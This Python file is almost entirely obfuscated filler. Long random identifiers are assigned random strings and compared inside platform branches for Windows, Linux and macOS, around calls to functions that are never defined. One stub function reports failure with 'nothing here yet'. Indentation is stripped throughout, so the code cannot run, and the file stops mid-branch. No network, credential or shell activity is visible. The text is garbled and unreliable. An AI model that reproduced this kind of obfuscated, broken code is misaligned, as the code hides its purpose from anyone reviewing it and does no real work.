def mYdssxnsmlAfvrSjolIFLdNSWdICTyEYmQJbnrImdVXGTLxpgMTBCjxQsBPIPCwxgCZxnmFTFjwtxPqutRQqsngShUqEoaiDLTvGJtxHpdekdgRxYrThxYRXvvNUnaav():
    """Unimplemented stub; always reports failure with a placeholder message."""
    succeeded = False
    detail = 'nothing here yet'
    return succeeded, detail
def gYHndANEDekWfPfsRRfODgwVLodFkkIbgqmiFOiwQlaRrwJBQHSEUlgdVJLHFADyIzHqNfHdfSrwWltrXDsmiXMwywfbzrUtRTVhQyVUUWwekdxICNHHrUWuECSiIFIh(plat_type):
if plat_type.startswith('win'):
VJhOEGEZWhyOetfDcyDxunEgoXdLUHhwzAQcAHESknkiBVyWoYUSZQUNquFEaYKQOgakplXgYrjxejaRnvIPAYybGzgHjISFtiraPrFDtUDdgrTQpNobYSpQohJcDdFP = 'btCbFsOiqNUJluaPzhHZEwEHmdAbkUgxyujcPkNOernrIAzzuYjVMBjHzozzNMLlPzckwjccLcHRkrrThJxuySGaSNxWyiMuZzAXAoVYMMyidfGkXhAblPgupQVDswDa'
TAtRaliyAlWKxnlwKyRktkTzQpaKopzFBjFZKhHZgDTZrIDWtouritgxDgwgOzWgdiFzpcfNzqerPLfCNJoxbzVhdMeYoPjIMuigTWQWYdKXTfNqyLODlGLjLKKyjPNf = 'pGOXTcaMCSbhxaFuBwQwIpZKDLcskJazlFMECHYitlFHsjmXpsivNVkynlHtUJoiBCrbHQwpnwXGuexRvLYDIpAXQxpWngoOtGFQlECpNAbRfNktuYuBeaPtobdtmMNP'
if VJhOEGEZWhyOetfDcyDxunEgoXdLUHhwzAQcAHESknkiBVyWoYUSZQUNquFEaYKQOgakplXgYrjxejaRnvIPAYybGzgHjISFtiraPrFDtUDdgrTQpNobYSpQohJcDdFP != TAtRaliyAlWKxnlwKyRktkTzQpaKopzFBjFZKhHZgDTZrIDWtouritgxDgwgOzWgdiFzpcfNzqerPLfCNJoxbzVhdMeYoPjIMuigTWQWYdKXTfNqyLODlGLjLKKyjPNf:
qlIoYprazcgXgpgABdsydeTxXpOcZfCnCOxTIOSSZLrDhFAPWTHKvLajBIqcwmWDBSElOEFAjtphzaoCuGIWcuvrfAXwdvtfeOanrfRSwtOfUalLHbPKGctVJycrFThL = 'sNmHaVgukewBxomCavtRdktXeMuUyAcGFISSdYaYnsaiUeOptNbiAZeUYpvMNvLcMFcgEuKsvRLqXQCzUqJrZhAuiIwTxibgrfZMFdXUsbVvtGQVklmGToSbIndcJNmL'
gcsSruwvHQgqEmRrxPlKhSsjHlvPfPAJHMzhegbyWZZSyZeUPmRTyFZUOBvTmHVeFfTWeQUEDXNIcIoaNeNSymSvcAJyuIfynUKmDMBRDoBdplkvllTDmARWxVVhIoag = 'wypdmjLzDRElUKhvubtxIgRTdSBCbwhxTTWuUsYpZonDBTHHqbLMxVkGKvhgANgVBScYubKsglyuqNqjBmaPZAsYTsmSpQhdTYLIHDayEhBPPdozRzwkkxDQoMAqzjYd'
gcsSruwvHQgqEmRrxPlKhSsjHlvPfPAJHMzhegbyWZZSyZeUPmRTyFZUOBvTmHVeFfTWeQUEDXNIcIoaNeNSymSvcAJyuIfynUKmDMBRDoBdplkvllTDmARWxVVhIoag = qlIoYprazcgXgpgABdsydeTxXpOcZfCnCOxTIOSSZLrDhFAPWTHKvLajBIqcwmWDBSElOEFAjtphzaoCuGIWcuvrfAXwdvtfeOanrfRSwtOfUalLHbPKGctVJycrFThL
success, NmOtigRiHNqlJxVKDFTueXpfkXtrEaaUPWrloCdgxZSgFXKAkpwqEFZKhEisDwmOGhdbMqLBpwklXthMNHQCagqkJqLMhZRMWPtxhotCnCmKtNHKdctvtiloraUvKeOW = RxcRLAtmXlEHutqjsTqPDnbkoGVfDtXIqoCNheDOiobDwKjpnzKTxqnKEKMbaLOReulMrzvPDceQQiZeQjYNKdJhiFFsHWqWxIWcCFIvJkBzsCEEYJFqKIipJAIonbjW()
uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf = 'OjaHnwKEIqThKiBVheltLvmLvFMAmqyymHzcTxyRzunDcilUDqaaPQkvpgueAzJOXJkoAVLtyWETcoezvZTAsBVhJDPVdbhvXqdWWKFgPMcSAvJSuVFOlIPGjokYoPoH'
iuuMrdblXuvyRrpKcCnNzjcfPKNjLsdRQFTQZCZtNXvxmikyxyRatZPZhlWbITyLbjjIvFnZpImxoUfQYKTrWimmXUsFJnsMkvpVwztmTbqKjkmhgvndWWMPiqrJdmPe = 'DNWfbKZDAYJoGVlMmZuAcKcOkWoosgjiPWBWyYUitKrOJDoNjEqxJRldchlgMhFBamKLGhHbQQjfQpomcgqwfRqymzfmlgQjCGXnukswrFnHpDroIuvCTsJSAjOmKeTL'
VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH = 'kSUyoYypYnIYxiSlhROAgrPgwcxhPOvBKGotMczeIssFncLwjWlApgJxBEMnpCTKGoZPRZCzruCDWcpqWnByKACSCRCNpdXtzafoRAPRHVpPFaEVohvQSmmMIkKZMzgS'
DWQVzfGIkuMakqLVUJtYiLEIuyOmBfgKRSSbOTHtXDURCuYweyaHhUdSiwCzRyUnqZUfDTmJOSvsyHrhYcvVdOuvONUglcVsmYxZwDHiVVzwYoSBnJuiEZAMkZoWUutO = 'AnGeHaZRGpKbYInBYVmNeBUjykhzUEyGpNiniDpkGXaYqrQBVMxylLLlNLuOGLmRHwnsmdNGSYRdlnAoCFKLQQUZbbyvPmFmQNbnaIjtNxhMcFQTsoDpMFaZAKQikHTb'
lBKVzUszcgwhOmNyGAJaJvbaNwLaARswRgKbZfGoDrlkTuIPWcmipJjOnXfIUBVyOcTnadPGdkKIwEyVNfuaBKZlNJZojxRbfhIbmqtMgwUyfIwivwmVvElnblGYhNVb = 'iypWDEQTcOorcsmtuenCDoFLsqPJmsYOxrZbksScdFWvCZivxoQjRdOSqwVLtJlZqIstFNYAoaSaqptjZpLiLxuPVoKqyARGqbQoiKreZxqXQQiMVAWuRqYZBGbOBKIX'
HleUzkOPzNjWMRWuvlbNetDTjGWGPuipaluggoWxfjHkvGVVYjBbVmwwdVmlanRFfohXMRvynDsWMlcwcwhHbfZCitJGHpPgxEIOiGlUpjAmyvYwrhgHLuxLvdznwSyE = 'XMzPYySZbbjCBteVWaLwHpfvNLCofqttotVMcZPmNMOsavWTPAHneLoexrKBPXnbDKGbcFPPEfuokAkfEpXmhWNOqIehUKkinAiIrVSeBbLCqccyZgfQykNlConHiOeU'
if uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf != DWQVzfGIkuMakqLVUJtYiLEIuyOmBfgKRSSbOTHtXDURCuYweyaHhUdSiwCzRyUnqZUfDTmJOSvsyHrhYcvVdOuvONUglcVsmYxZwDHiVVzwYoSBnJuiEZAMkZoWUutO:
iuuMrdblXuvyRrpKcCnNzjcfPKNjLsdRQFTQZCZtNXvxmikyxyRatZPZhlWbITyLbjjIvFnZpImxoUfQYKTrWimmXUsFJnsMkvpVwztmTbqKjkmhgvndWWMPiqrJdmPe = VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH
for HleUzkOPzNjWMRWuvlbNetDTjGWGPuipaluggoWxfjHkvGVVYjBbVmwwdVmlanRFfohXMRvynDsWMlcwcwhHbfZCitJGHpPgxEIOiGlUpjAmyvYwrhgHLuxLvdznwSyE in DWQVzfGIkuMakqLVUJtYiLEIuyOmBfgKRSSbOTHtXDURCuYweyaHhUdSiwCzRyUnqZUfDTmJOSvsyHrhYcvVdOuvONUglcVsmYxZwDHiVVzwYoSBnJuiEZAMkZoWUutO:
if HleUzkOPzNjWMRWuvlbNetDTjGWGPuipaluggoWxfjHkvGVVYjBbVmwwdVmlanRFfohXMRvynDsWMlcwcwhHbfZCitJGHpPgxEIOiGlUpjAmyvYwrhgHLuxLvdznwSyE != VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH:
iuuMrdblXuvyRrpKcCnNzjcfPKNjLsdRQFTQZCZtNXvxmikyxyRatZPZhlWbITyLbjjIvFnZpImxoUfQYKTrWimmXUsFJnsMkvpVwztmTbqKjkmhgvndWWMPiqrJdmPe = iuuMrdblXuvyRrpKcCnNzjcfPKNjLsdRQFTQZCZtNXvxmikyxyRatZPZhlWbITyLbjjIvFnZpImxoUfQYKTrWimmXUsFJnsMkvpVwztmTbqKjkmhgvndWWMPiqrJdmPe
else:
lBKVzUszcgwhOmNyGAJaJvbaNwLaARswRgKbZfGoDrlkTuIPWcmipJjOnXfIUBVyOcTnadPGdkKIwEyVNfuaBKZlNJZojxRbfhIbmqtMgwUyfIwivwmVvElnblGYhNVb = uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf
else:
VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH = uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf
uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf = lBKVzUszcgwhOmNyGAJaJvbaNwLaARswRgKbZfGoDrlkTuIPWcmipJjOnXfIUBVyOcTnadPGdkKIwEyVNfuaBKZlNJZojxRbfhIbmqtMgwUyfIwivwmVvElnblGYhNVb
if VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH == uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf:
for HleUzkOPzNjWMRWuvlbNetDTjGWGPuipaluggoWxfjHkvGVVYjBbVmwwdVmlanRFfohXMRvynDsWMlcwcwhHbfZCitJGHpPgxEIOiGlUpjAmyvYwrhgHLuxLvdznwSyE in uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf:
if HleUzkOPzNjWMRWuvlbNetDTjGWGPuipaluggoWxfjHkvGVVYjBbVmwwdVmlanRFfohXMRvynDsWMlcwcwhHbfZCitJGHpPgxEIOiGlUpjAmyvYwrhgHLuxLvdznwSyE == VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH:
VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH = uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf
else:
VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH = lBKVzUszcgwhOmNyGAJaJvbaNwLaARswRgKbZfGoDrlkTuIPWcmipJjOnXfIUBVyOcTnadPGdkKIwEyVNfuaBKZlNJZojxRbfhIbmqtMgwUyfIwivwmVvElnblGYhNVb
elif plat_type.startswith('linux'):
IXroyowPnBvymYEQuIfjLOlosKqwzjvPIAvgzKqAutcDkoGhYImdEdIjVfowBqWkUMpTIuQlKcNYJaPkHXTokphCcTbYwBXKEmAXzFmwYsdPbCOMhzoRUwfQfjNJtMDv = 'EdzXFPddTWjYqvrECsBuYRYlyJzvdXZGGwwgHzhMRamiJBWgcbbfooCYiiPSUKzdlfRIUvbODONCsHerJhSQTnUJuFZqdDcbMjLEZWTJkbHtyrGEudPoKLzoRdWuUDav'
WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw = 'rJBuuYUiYiBaEkJIOnbNVXKlmeULREQwQrtUgBCZPuMaRRJTnIntsVoyiXwOtbZIUWjYqmHUTwZaxxinXTjJckrvsnXMzYhAksghVEuznhbCtkMeEJLWrXkLpUtfdZSa'
vHAjDvokIZZTzYvGcxumXmrNaffzVjujdlFlePtUKuUHYTdZeOIDToXjGdPoYNJenoGvljQlvzqBtcRoZIsRbYhSKettIUbvtPEfMYiyskybBSgrZvNnuTCAKmKtFrZR = 'trFZpiuODkCmOrwlFbOXtteYJONTIhhrqjxBOSnYlSvaLHeyncNVbnjuZaOGmuZtCJvlPvjWiQqCwGggxbyhAscdRNlsVUZVejEcImkjzmBWkEgKMAYcPngOlhaStLzQ'
YUpQZgDBIjevhbprAMJEhyvaSDzLPmJWPVafRlXjgMNzhaOoNtALUNDIxysALgjMmxBkEBKHgtSqfgMdqSklLpKwvqeKlwmorklabqvqdVMDrnFxfXSAZkXhzRudJkIn = 'wPYwqWfKcXIIARoCypcuWkCvdNuPwrIFJCYcOBmXLWRnGrGaTMIeeWdqDbwMUxZuamKLubRhxauJlfSxrlsAUCKuSaBVCmxLqtGgLUrDhNGUFOEhsvEbHwfFLpXbsZjF'
VxUAXUFyQoqufgYhaFwPrYGbpTjLVGfixtYcZMXbhUencngFHlXHteVJGyiaImfHzCdIAqzdxIURgqchvEqzsBbWDLpjugJGfBOrEKRspxCJlqwSdAUdkgHzZASdotkO = 'ooLwpizTQQQIYdtkOvCufyTkujzJJxsprvAJvkUTrEfCxSdSNJzTNfUIqWxgvMWNABpbrziJwVOHbKpitraEbsQwSvgvNwBTqrLbcrIAfDLQdjEcKTyLXoHRjeWZwWOq'
if IXroyowPnBvymYEQuIfjLOlosKqwzjvPIAvgzKqAutcDkoGhYImdEdIjVfowBqWkUMpTIuQlKcNYJaPkHXTokphCcTbYwBXKEmAXzFmwYsdPbCOMhzoRUwfQfjNJtMDv in WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw:
IXroyowPnBvymYEQuIfjLOlosKqwzjvPIAvgzKqAutcDkoGhYImdEdIjVfowBqWkUMpTIuQlKcNYJaPkHXTokphCcTbYwBXKEmAXzFmwYsdPbCOMhzoRUwfQfjNJtMDv = VxUAXUFyQoqufgYhaFwPrYGbpTjLVGfixtYcZMXbhUencngFHlXHteVJGyiaImfHzCdIAqzdxIURgqchvEqzsBbWDLpjugJGfBOrEKRspxCJlqwSdAUdkgHzZASdotkO
if WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw in vHAjDvokIZZTzYvGcxumXmrNaffzVjujdlFlePtUKuUHYTdZeOIDToXjGdPoYNJenoGvljQlvzqBtcRoZIsRbYhSKettIUbvtPEfMYiyskybBSgrZvNnuTCAKmKtFrZR:
WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw = YUpQZgDBIjevhbprAMJEhyvaSDzLPmJWPVafRlXjgMNzhaOoNtALUNDIxysALgjMmxBkEBKHgtSqfgMdqSklLpKwvqeKlwmorklabqvqdVMDrnFxfXSAZkXhzRudJkIn
elif WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw in IXroyowPnBvymYEQuIfjLOlosKqwzjvPIAvgzKqAutcDkoGhYImdEdIjVfowBqWkUMpTIuQlKcNYJaPkHXTokphCcTbYwBXKEmAXzFmwYsdPbCOMhzoRUwfQfjNJtMDv:
vHAjDvokIZZTzYvGcxumXmrNaffzVjujdlFlePtUKuUHYTdZeOIDToXjGdPoYNJenoGvljQlvzqBtcRoZIsRbYhSKettIUbvtPEfMYiyskybBSgrZvNnuTCAKmKtFrZR = WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw
if vHAjDvokIZZTzYvGcxumXmrNaffzVjujdlFlePtUKuUHYTdZeOIDToXjGdPoYNJenoGvljQlvzqBtcRoZIsRbYhSKettIUbvtPEfMYiyskybBSgrZvNnuTCAKmKtFrZR in WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw:
WmOAdXKAPeehwzQHoOEykgAxrTspyEjqmyHkrFxHEOotILIQteFNOLwwOPubreKCNuhTURNBvzeYCYDAgHpEJMkCboLSYMBSKkKEcHlSehUybueRbWYDQPgjnQvOSjrw = VxUAXUFyQoqufgYhaFwPrYGbpTjLVGfixtYcZMXbhUencngFHlXHteVJGyiaImfHzCdIAqzdxIURgqchvEqzsBbWDLpjugJGfBOrEKRspxCJlqwSdAUdkgHzZASdotkO
success, NmOtigRiHNqlJxVKDFTueXpfkXtrEaaUPWrloCdgxZSgFXKAkpwqEFZKhEisDwmOGhdbMqLBpwklXthMNHQCagqkJqLMhZRMWPtxhotCnCmKtNHKdctvtiloraUvKeOW = mvZhXEFKFfgNpNuuGltXFxzkQSecRsRXzlhAQkZglUYprNzQuQHQSeOSyDFiFpSxmwrSdhfQrzzCnTBtWVKKPEWhDTpWhAURMjXmlPYrdZFeLxLfRaSKTXiBjplrpOiC()
qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo = 'DkWAiixkbZUdyEtqIPnKglKBwhoFJNvQuxrJWWNuDoCYmyGLoIyJdwVzxLwAJPcQBzShAVGKCxowJZJfzRQkPtwOkLGNwnEeUDFvbsgFUODlwTFHRsxLeDDntveRCEzy'
RYeXoHrppKXHeablbEbwmhLxKPFmrSWuCwBnLygEMUmWwSZVRncNPXJChdKCTBOZMAZFMEcCrIbGFvoZHMAcoyexwigfruprBNynQEBKUojZeaWIMzMavjhBtNpHLCpM = 'dRhifJKzhbKlTuXpCJmrErqaBoAIVbgqwQFthkDHNElAixTPudTnriSSBvUnMjlsIxqIfwncoxdUekWlkCQWRJGiVeWwZWTxfYeoDsiZxEeMryfpVpZCMlUIROmBBYIP'
PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ = 'zPCemKddDWOCPFcgKkbbxHKFIbzVcpnyYgZHjLMWctwXGHTmIhyqEHtGTYwYhJijJdQmiRaEcOVnRtaoboSFzsAQUhoXOeOLFiCWMZPMhOvwKEdpuEBnrjjyIfENFHhk'
sWcAPDAhMuinpAZrhIGxkyILWTAdKNIMEnnAiRiHwYYRtlrCzAsibRsbtIsnAKSIqXiFFjnhPSkmTFsQzidjuwlTkJdljzVCSsBxpfflDDoSBKyIMgjLUpgUNSzqkhTD = 'XuTQAhTvnZAbxaqQerXgzWUOaAhqqgufchOcLGViyknUZUNYTCnLIYLfgRkrounklIBPWINIqJYRjYfZRmvWEcYQbMHvVGvlLNwyQbLdBAAKcUgQwFKVhVdsqeHqriEs'
mnDEvlbiIHcTjwGozuKKNoJjiQGwWNnCyUHKDZXaWrOckYDCwTqsMEiPMqODtEWJODZiLGQtwGpsPQuzdIvsXgJpiioqWYQMwBYZDolgOlVjqLNphzrujoiVbKJMqANj = 'abQUJZhkpqXDBybZETEvllmLTHhUxfBegDARnztTJQxlzMBZrwpdQbJIBVvwhgMyakNLHzswjJfIypZQMitbDovbQiRkPdolLwocZKnWVVTMiSwBWhGzMMSDMbdLphEf'
hLPIyHnTgbBLbZhdZLdbEKtkwQKbxdExSoCyRwskuhvCRYOcqpnWxYZNfXmleTOFsozYqZxdGBgVPqSYukfiCSYKnNNZlsOvgnhTDGKYeNeFIfxsViDajpXhSHLfNkSp = 'QbfWJHLSkczBtPzlcgPeoEODqWsTDKhxCyXbKiktBfGyWdoLBJoFdKwzfjKOlCOWIOBZIAbUUuawjpjwvkvKcmfHGDvbfZIGnIPPMfeRGzccKVRqvbvazbUzIbDHuxtI'
if qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo != sWcAPDAhMuinpAZrhIGxkyILWTAdKNIMEnnAiRiHwYYRtlrCzAsibRsbtIsnAKSIqXiFFjnhPSkmTFsQzidjuwlTkJdljzVCSsBxpfflDDoSBKyIMgjLUpgUNSzqkhTD:
RYeXoHrppKXHeablbEbwmhLxKPFmrSWuCwBnLygEMUmWwSZVRncNPXJChdKCTBOZMAZFMEcCrIbGFvoZHMAcoyexwigfruprBNynQEBKUojZeaWIMzMavjhBtNpHLCpM = PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ
for hLPIyHnTgbBLbZhdZLdbEKtkwQKbxdExSoCyRwskuhvCRYOcqpnWxYZNfXmleTOFsozYqZxdGBgVPqSYukfiCSYKnNNZlsOvgnhTDGKYeNeFIfxsViDajpXhSHLfNkSp in sWcAPDAhMuinpAZrhIGxkyILWTAdKNIMEnnAiRiHwYYRtlrCzAsibRsbtIsnAKSIqXiFFjnhPSkmTFsQzidjuwlTkJdljzVCSsBxpfflDDoSBKyIMgjLUpgUNSzqkhTD:
if hLPIyHnTgbBLbZhdZLdbEKtkwQKbxdExSoCyRwskuhvCRYOcqpnWxYZNfXmleTOFsozYqZxdGBgVPqSYukfiCSYKnNNZlsOvgnhTDGKYeNeFIfxsViDajpXhSHLfNkSp != PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ:
RYeXoHrppKXHeablbEbwmhLxKPFmrSWuCwBnLygEMUmWwSZVRncNPXJChdKCTBOZMAZFMEcCrIbGFvoZHMAcoyexwigfruprBNynQEBKUojZeaWIMzMavjhBtNpHLCpM = RYeXoHrppKXHeablbEbwmhLxKPFmrSWuCwBnLygEMUmWwSZVRncNPXJChdKCTBOZMAZFMEcCrIbGFvoZHMAcoyexwigfruprBNynQEBKUojZeaWIMzMavjhBtNpHLCpM
else:
mnDEvlbiIHcTjwGozuKKNoJjiQGwWNnCyUHKDZXaWrOckYDCwTqsMEiPMqODtEWJODZiLGQtwGpsPQuzdIvsXgJpiioqWYQMwBYZDolgOlVjqLNphzrujoiVbKJMqANj = qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo
else:
PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ = qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo
qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo = mnDEvlbiIHcTjwGozuKKNoJjiQGwWNnCyUHKDZXaWrOckYDCwTqsMEiPMqODtEWJODZiLGQtwGpsPQuzdIvsXgJpiioqWYQMwBYZDolgOlVjqLNphzrujoiVbKJMqANj
if PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ == qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo:
for hLPIyHnTgbBLbZhdZLdbEKtkwQKbxdExSoCyRwskuhvCRYOcqpnWxYZNfXmleTOFsozYqZxdGBgVPqSYukfiCSYKnNNZlsOvgnhTDGKYeNeFIfxsViDajpXhSHLfNkSp in qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo:
if hLPIyHnTgbBLbZhdZLdbEKtkwQKbxdExSoCyRwskuhvCRYOcqpnWxYZNfXmleTOFsozYqZxdGBgVPqSYukfiCSYKnNNZlsOvgnhTDGKYeNeFIfxsViDajpXhSHLfNkSp == PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ:
PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ = qPpWyFsbQXtaqBsPjtlgHwxqxOydtYzIzWkGmPrNpSpkuYlpKgalEoIodepTVLtjrHXIRdxsVIYhWPlSwkbdqliUDOrjvtgkMLxGuICXSsvUDPJdATtSijFXaLozktZo
else:
PPCXzRAtFjSGOzAarIqhqEbOQaXmFWqbyphdjqlAybTbpAmhXSxlJBygFbBLSEHJtLGBvzKhqhDyRIlpijQmsTqhWaluNHefkDWMZAoXZkXeGWtOtOHSUfqwayOhcLSZ = mnDEvlbiIHcTjwGozuKKNoJjiQGwWNnCyUHKDZXaWrOckYDCwTqsMEiPMqODtEWJODZiLGQtwGpsPQuzdIvsXgJpiioqWYQMwBYZDolgOlVjqLNphzrujoiVbKJMqANj
elif plat_type.startswith('darwin'):
uiXMSqOwzwpMXWiUhBOXwzZErQUCZRtWFHIPBYkgGLBSeCDarApaHBsGqYYJDJEqXBNLcXbqfLBWxtGBnfweZgESlMpmdbWdtjLAfvrTZBOgZGjscMAHiXKqHlTBuGaU = 'xPNahBBlwJldTxKlQOMivnIFRxJexaEUbhqwPNZdIKTgJMTnmvvPkmAnpQfOiVBxGJBaJIflgCCEqCVrjUjZlyoMDOgFWkGvNcIePiVhDvpoBSJFqVQqxxNDmbNAxxlU'
